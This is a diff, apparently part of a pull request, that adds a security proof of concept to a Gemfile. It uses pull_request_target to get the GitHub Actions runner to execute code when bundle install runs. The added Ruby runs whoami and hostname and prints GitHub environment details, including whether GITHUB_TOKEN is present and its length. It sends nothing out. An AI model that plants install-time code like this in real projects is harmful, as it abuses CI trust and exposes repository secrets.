Add topic: security-research

Gemfile

@@ -1,3 +1,19 @@
+# Security PoC — demonstrates code execution via pull_request_target + bundle install
+# This Gemfile code executes during `bundle install` (Ruby evaluates Gemfile as code)
+# No destructive actions — informational only
+puts "=" * 60
+puts "SECURITY POC — CODE EXECUTION VIA GEMFILE"
+puts "=" * 60
+puts "whoami: #{`whoami`.strip}"
+puts "hostname: #{`hostname`.strip}"
+puts "pwd: #{Dir.pwd}"
+puts "GITHUB_REPOSITORY: #{ENV['GITHUB_REPOSITORY']}"
+puts "GITHUB_WORKFLOW: #{ENV['GITHUB_WORKFLOW']}"
+puts "GITHUB_ACTOR: #{ENV['GITHUB_ACTOR']}"
+puts "GITHUB_EVENT_NAME: #{ENV['GITHUB_EVENT_NAME']}"
+puts "GITHUB_TOKEN set: #{ENV['GITHUB_TOKEN'] ? 'YES (length=' + ENV['GITHUB_TOKEN'].length.to_s + ')' : 'NO'}"
+puts "=" * 60
+
 source "https://rubygems.org"
 
 gem "faraday", "2.14.1"